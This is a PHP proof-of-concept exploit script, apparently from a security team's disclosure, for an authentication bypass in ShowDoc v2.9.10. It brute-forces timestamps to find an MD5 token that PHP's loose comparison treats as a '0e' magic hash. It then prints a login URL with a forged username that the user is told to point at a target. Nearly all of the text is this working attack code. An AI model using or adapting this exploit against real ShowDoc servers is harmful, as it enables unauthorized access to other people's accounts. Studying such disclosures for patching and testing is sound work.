<?php // Credit:Qianxin, Network Security Department, Product-Safety Team ( Unc1e ) // Date:2021/10/13 /* ShowDoc v2.9.10 Auth Bypass PoC #2: 1) PHP Type Juggling (弱类型), see https://owasp.org/www-pdf-archive/PHPMagicTricks-TypeJuggling.pdf 2) Using that: ('0e111' == '0e222') => (bool)true 3) This script use Brute-Forcing to find a possible collision */ $username = 's' ; // Forged username $time = 1694131871 ; //2023-09-08 08:11:11, always valid timestamp $login_secret_key = '35d0b093f240cf6abedbe85fb174d317'; //a possible bin2hex( random_bytes( 16 ) ); $total = 1000000; for ($i=0; $i<(1000*$total); $i++){// try to Find solution in 1 Billion numbers! $time += 1; $token = md5($username.$login_secret_key.$time); if (substr($token, 0, 2) === "0e"){ if(preg_match('/^[0]+e[0-9]+$/', $token)) //0e123, 00e123, ... { echo "time:$time, while final is: $token".PHP_EOL; } } if (($i % $total) == 0){ echo "[".($i/$total)."‰]".PHP_EOL; } } echo "http://[showdoc]/server/?s=/api/extLogin/bySecretKey&username={$username}&time={$time}&token={$token}&redirect=".PHP_EOL;// Please replace the [showdoc] to your target ?>
You have javascript disabled. You will not be able to edit any code.
This script was stopped while abusing our resources